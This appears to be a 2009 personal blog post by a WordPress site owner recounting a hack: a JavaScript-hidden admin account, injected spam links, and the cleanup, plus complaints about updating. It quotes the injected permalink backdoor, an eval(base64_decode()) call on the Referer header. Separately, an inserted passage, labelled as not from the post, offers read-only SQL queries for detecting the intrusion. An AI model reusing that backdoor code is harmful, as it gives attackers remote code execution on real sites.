ERIC SHEFFERMAN <DOT> COM

Blog-o-Goodness

WordPress Security Exploits – This site was hacked

I still have no idea what this means.

I’m currently running WordPress 2.8.4 on this site.

One of my older sites was hacked as per

http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/

and the permalinks were changed to

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

There was a hidden user named “WordPress” — javascript was being used to prevent the user from showing in the admin users section (and it didn’t show the user in the user count). My computer is running slow, so when looking at the user list this second user would appear and then disappear as the javascript executed. On a faster computer, it would have been impossible to see the hidden user. Dumbass javascript tricks.

I used WordPress Exploit Scanner and found one post had a bunch of stuff (spam links) in it. Fortunately I had revisions on (don’t even remember that was set that way) and I was able to get back the original version of the post.

I exported the database as an XML file and poked around and it looks like the safest thing would be to look through the data exported and then import the data into a totally fresh WordPress install.

Icky, but I guess that’ll get me to work on the site again. I’d like to use the modified theme I made for it, so I’m probably going to have to compare the theme to a safe copy line by line to make sure there isn’t any stuff added to the php.

Installing all the plugins and the settings is going to be a LOT of work. All the analytics things, etc. that need their own Google ID, Yahoo ID, etc.

OK — but now to this blog here — it’s been running the most updated WordPress. I clicked on the users list and the same thing… a user named WordPress that disappears. So I messed around until I deleted the user (see the link below for that info — I wound up first deleting all the users other than me since I’m the only user (no idea how/why there were so many others) — I then had to ADD a user, then use the URL from the edit button for that user but modify the URL until I hit upon the URL with the ID number of the hidden “WordPress” named user so that I could delete it).

http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/

I can’t SEE any evidence of other problems — this blog didn’t even have its permalinks changed (I don’t know if that’s a big deal or not, since everything else I’ve seen about this exploit identifies it by the change in the permalinks). So there’s no way for me to know what else was done to this blog. But this one has a lot more stuff on it and the last thing I’d want to do is try to export the data and re-create it all. Even more plugins etc. to configure.

On the other hand, I have no idea if the google adsense code being displayed is even crediting my account now. There’s a “harmless” way to create a huge revenue-generating exploit. How long would it take before it was really noticed that all the adsense revenue from millions of blogs was being siphoned? Google would notice, but how long would it take individual blog owners to catch on?

Which leaves me at – I have no idea what to do next.

Even if I survive this exploit, this suggests that if a website is being run as software (as opposed to plain html files) then one needs to be on the lookout DAILY for new security updates, etc. That doesn’t leave a lot of room for say… taking a day AWAY from the damn computer.

– – –

Further thoughts:

This really makes WordPress a burden — I have way too many sites running WordPress to have to perform this kind of maintenance at a moment’s notice. I think a solution would be automatic upgrades. While I’m not a fan of the concept of “automatic” — the hackers are doing these attacks in an automated way. As a mere human, I can’t always be ready at 3am because that’s when some attack script decided it was time to attack my site. At least then there’s a chance my site would automatically update before the hacker hits it. The worst case is the automatic upgrade breaks my site — but that’s no worse than the hacker breaking my site. And probably at least it’s a known quantity. Right now I still have no way of knowing if that extra user in this site was a symptom of a worse attack or was the sum total of the attack.

Checking my emails — even though this site had a user added, I received no email about the user being added. For my other site, the one that was completely hacked, I did receive an email on September 1:

New user registration on your blog <BLOG NAME REMOVED>:
Username: MikeWink
E-mail: bugbeemershonyhe@gmail.com

Searching for this email address, I found these links:

http://www.emintelligencer.org.uk/2009/09/02/spam-hack-attack/

http://www.packcamera.com/archives/409

http://mice.org/blog/an-open-note-to-wordpress-spammers-hackers/

But just knowing that I’ve now removed the user means NOTHING. There could be malicious code added ANYWHERE and I’d have no way of knowing. Worst of all, it could be added in the theme — which I’ve customized.

And that’s what brings me to the rant. So many themes force the user to modify the code — even if it’s just a simple thing to change the header graphic. This makes updating the theme a pain since it’s necessary to figure out how to redo all those modifications each time. Since I have no way of knowing if the theme has been corrupted, I have to start from scratch again modifying a theme.

It’s a computer! Why hard-code things like header graphics when it’s so easy to make that an option the user can select on a control panel? So many little options like that would eliminate the need for hand-adjusting a theme.

I’m also realizing now that things that aren’t saved include stuff like all the sidebar widgets settings and how they are laid out — things that are very manual labor to set right again. So even though I have the text, getting the blog to look like itself will be hours of labor.

And this hours of labor is multiplied by the number of sites affected. That is why I think it needs to be the WordPress software itself that does the protection and auto updating. I can’t do this across every site I’ve built for myself AND other people. There’s too many sites.

I’d also like to see some way of “locking” a WordPress site. Some sites are done in WordPress for convenience — getting a pretty linking structure, being able to add on components later, getting a quick “professional” look by just adding a nice theme — but these are STATIC sites. They aren’t being updated, they aren’t being blogged on, they could just as well have been plain HTML except that I have no good software for designing a plain HTML site. Why can’t I just lock these sites in some way instead of leaving them open to a user being added and being hacked? The site that’s my big problem right now is one that I haven’t updated at all in 2009. So it really could have been plain HTML for all I needed. But now it is going to be a major project. All because WordPress continued to be active and interactive even though I had no need for it to be so.

Oh — and this site? I really have no idea how to tell if it was really hacked, if the mysteriously added user was just SOME OTHER exploit, or what. And as much as I’ve read, most of it says that I should just be checking every day for WordPress updates and maintaining the blog. That turns this blog into a full-time, 24/7, no-vacation job. That just can’t be worth it.

And it still doesn’t answer the question: Is this site exploited or not? How would I know until it REALLY shows some problem? And by then, of course, it’s too late.

I am tired.

– – –

Update September 7, 2009

So here’s a post on WordPress.org telling people to upgrade immediately:

HACK WARNING: UPGRADE IMMEDIATELY
http://wordpress.org/support/topic/307660

Here’s the upgrade release telling people to update to version 2.8.4

http://wordpress.org/development/2009/08/2-8-4-security-release/

It says:

WordPress 2.8.4: Security Release

Posted August 12, 2009 by Matt. Filed under Releases, Security.

Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

Um. I’m thinking that this somehow did allow remote access and that this was possibly an extreme understatement of the problem. I have no idea still how many websites of mine are compromised AND no idea how severe the compromises are. But having to reinstall a fresh WordPress and then reimport exported data and then attempt to get the whole look-and-feel of the blogs back to where they were is potentially a LOT of pointing and clicking.

So I could have POSSIBLY prevented this problem IF I had seen the security release notice (I am SUPPOSED TO be checking for security updates every single day as if that was my sole life purpose, right?) and acted right away to update EVERY SINGLE WordPress site I ever developed for myself or someone else.

Yeah.

Here’s two support forum posts on the topic.

Question About Possible Hack of Site
http://wordpress.org/support/topic/307518

WP adding code to the end of url links breaking them
http://wordpress.org/support/topic/297639

These are the best info I’ve found on this, and yet they don’t give very concrete info.

My thoughts:

This is an AUTOMATED attack. It’s not some dude staying up late working on attacking blogs one at a time. This is some software running that is attacking blogs as fast as a computer can. That’s why big important sites are being hit and stupid sites and abandoned sites — the software doesn’t care.

No one has suggested exactly what the hack did, is doing, where it left back doors for future attacks, etc.
http://wordpress.org/support/topic/297639/page/2
There’s a post suggesting that bogus admin accounts were created on a WordPress 2.8.4 install without the permalinks being messed up (like what happened here at ericshefferman.com). I think that once you’ve got an admin account you can access through the edit functions on WordPress the plugin code, the theme code, and all sorts of other stuff — so just because the permalinks weren’t messed up doesn’t mean that there isn’t all sorts of bad stuff hidden on the site. JUST BECAUSE THE FAN ISN’T TURNED ON, DOESN’T MEAN THAT THERE’S NO FECES ALREADY ON THE FAN BLADES. Again, it’s not a person who is doing this — software can patiently screw with just one obscure file on millions of websites one-at-a-time. And probably do all that in seconds anyway. And just because the stuff was done now doesn’t mean it has to reveal itself immediately — it could be waiting for 9/11 or 12/12/2012 or who knows when.

I love the posts from programming snobs like the ones that can be found here
http://wordpress.org/support/topic/307518/page/5
where someone is talking about how version 2.8.4 is the latest so that’s where the focus should be.
My last post on this blog was on May 10, 2009 — a bit before the Security Update Notice. As Steve Martin would say, EXCUSE ME.

This is the type of thinking that I can’t stand:

folks, you can’t upgrade “just once a year” because you “feel like it,” if you want the max protection available at any given time from WordPress. it IS your fault if you don’t/can’t/won’t keep your installs current – whether you do them yourselves or pay someone to do them.

it’s just laziness, not to upgrade, compounded by a lack of knowledge. btw, i have about 9 blogs. they all get upgraded when there’s a WP upgrade. is it a pita? yeah, kinda. but the whole thing is done in less than an hour – a small price to pay for keeping installs as safe as possible.

Yep. It is a menial task. A person probably can upgrade 9 blogs in about an hour. Probably even a person who makes minimum wage or less. WHICH MEANS IT’S A TASK THAT SHOULD BE DONE BY A COMPUTER. Because a computer doesn’t mind spinning its wheels at 3am to deal with the latest security issue right away — whereas I’d rather be SLEEPING.

That’s why I think that WordPress might as well just automatically update itself. Though auto-updates might occasionally screw things up, that’s gotta be better than the alternative — which is me checking constantly EVERY DAY (and probably multiple times throughout the day) to see if there’s a WordPress security update. Because if there is an exploit, it is going to be rolled out and hit vulnerable sites with a speed and accuracy that can only be achieved by computer.

The argument that a person can update 9 blogs in an hour is absurd. How many blogs can some hacker SOFTWARE exploit in an hour? Thousands? Or is it more like hundreds of thousands?

AND it brings me to
http://www.netpassiveincome.com/wordpress-mysql-injection-permalink/

which says:

The same attack happened to one of my WordPress blogs that has the latest 2.8.4 version on it so I don’t think upgrading to latest version will help prevent this attack from happening to you (but highly recommended to run latest WordPress version anyway).

Which is what I think happened here at ericshefferman.com. So even claiming I’m at fault for the non-updated blog doesn’t help with the blog that’s hacked running 2.8.4.

Although I didn’t have any of the permalink issues on this blog, the fact that someone was able to create an admin account means that they had access to modify all sorts of stuff. And it only takes one little bit of php code left in some file for them to re-hack anytime they want to.

This rapidly gets too complex and it’s past 3am.

Have I Been Hacked? “WE DID 0 QUERIES” suddenly in footer
http://wordpress.org/support/topic/305941

Hmm – this search:

http://www.google.com/search?hl=en&q=%22WE+DID+0+QUERIES%22&btnG=Search

gets “Results 1 – 10 of about 11,000 for “WE DID 0 QUERIES”. (0.06 seconds)”

So is the solution to say that there are about 11,000 webmasters who are idiots?

Or maybe this stuff is just getting way complex. It’s not like I’d ever have the time to personally READ every line of code that makes up a WordPress site, much less attempt to comprehend it all.

This reminds me of what I was thinking about this afternoon – when I was first looking into using blog software (a LONG time ago), I came across blosxom and what I liked about it was the idea that you could run the software on your computer and generate your entire blog, and then upload it all to your webserver as static HTML. No hacking possible.

http://www.blosxom.com/documentation/users/configure/static.html

– – –

Update – after 5 hours of sleep

If any of the above seems rambling or outrageous, it was written with very little sleep and very lots of frustration.

I just changed the database password on this site, but wonder about the effectiveness at this point. A user with admin access could have used the theme editor or plugin editor to leave backdoor code in any file on the site. Since they were able to add the first admin without me receiving an email notice of the event, they ought to be able to add another.

Some of the advice in other blog posts about this seems to be a little off. I now realize that using phpMyAdmin on my web host to look at the wp_users table would have told me the date the fake admin was added to the system. I could then presume that database backups from before this date were “safer”. Since I was only looking at the Authors & Users setting within WordPress when I deleted the user, that information was not available to me.
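The checks described above (the hidden admin in the user list, the date the account was created, the rewritten permalink structure) can all be made directly against the database instead of through the admin screens, so that a script injected into the admin pages cannot hide anything. The queries below are an added example, not from this post; they assume the default "wp_" table prefix (the capability meta key is the prefix plus "capabilities") and MySQL syntax, and are meant to be run read-only, for instance from phpMyAdmin's SQL tab.

```sql
-- Added example (not from the post). Assumes the default "wp_" table prefix
-- and MySQL; all statements are read-only.

-- 1. Every account that holds the administrator role, oldest first.
--    Reading wp_users/wp_usermeta directly sidesteps any JavaScript that
--    hides rows in the admin user list. user_registered is set by WordPress
--    when the account is created; only someone with direct database access
--    could alter it afterwards, so treat it as a strong but not absolute date.
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users AS u
JOIN wp_usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%administrator%'
ORDER BY u.user_registered;

-- 2. Real number of user rows, to compare against the count the admin
--    screen shows. A mismatch means something is filtering the list.
SELECT COUNT(*) AS user_rows FROM wp_users;

-- 3. The permalink structure, which this attack rewrote to contain PHP.
--    A legitimate structure is only tags like /%year%/%postname%/; any
--    eval( or base64_decode( in it is injected code.
SELECT option_name, option_value
FROM wp_options
WHERE option_name = 'permalink_structure'
  AND (option_value LIKE '%eval(%'
       OR option_value LIKE '%base64_decode(%');

-- 4. The most recently created accounts of any role. The oldest
--    unexplained row here is the earliest date a backup must predate.
SELECT ID, user_login, user_email, user_registered
FROM wp_users
ORDER BY user_registered DESC
LIMIT 10;
```

If the site uses a non-default prefix, substitute it in every table name and in the 'wp_capabilities' key, since WordPress stores the role under the prefixed key.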

I use the plugins WP-DBManager and WordPress Backup (by BTE) to email myself weekly backups (plenty often for a website I update a few times a month). I think (but don’t know) that by using these backups I could reproduce most of the site (except for some old content whose files I didn’t put in the Uploads directory, since I didn’t know about these plugins at the time). However, I have no idea how far back I’d need to look at the backups (though I suspect anything before August was probably safe).

There doesn’t seem to be much good information on this at WordPress.org. The feeling I get is that it’s my fault for not updating my software sooner — which is really saying that it’s my fault for using WordPress at all.

At this point I really have to wonder what DYNAMIC features of WordPress I need. Much like I was saying about Blosxom, I could run WordPress on a local computer and then use spidering software here to get copies of every generated HTML page of the site and then just ftp all those HTML pages as a static site to my server the few times a month I write an update. The only major thing I can think of that would be missing is search, but I could just implement a google search instead of a WordPress search.

Category: Security, WordPress

One Response

  1. Hi! I noticed the ping back to my article and thought I’d drop by and read your post. I may have some answers for you but they are way too lengthy to get into on your comments. I believe you can see my e-mail address when you moderate this comment. If so, please contact me via e-mail to discuss this. I will be more than happy to help you out. And thank you again for linking to my post!

    Debbie Mahler
    MICE Training, Technology & Education
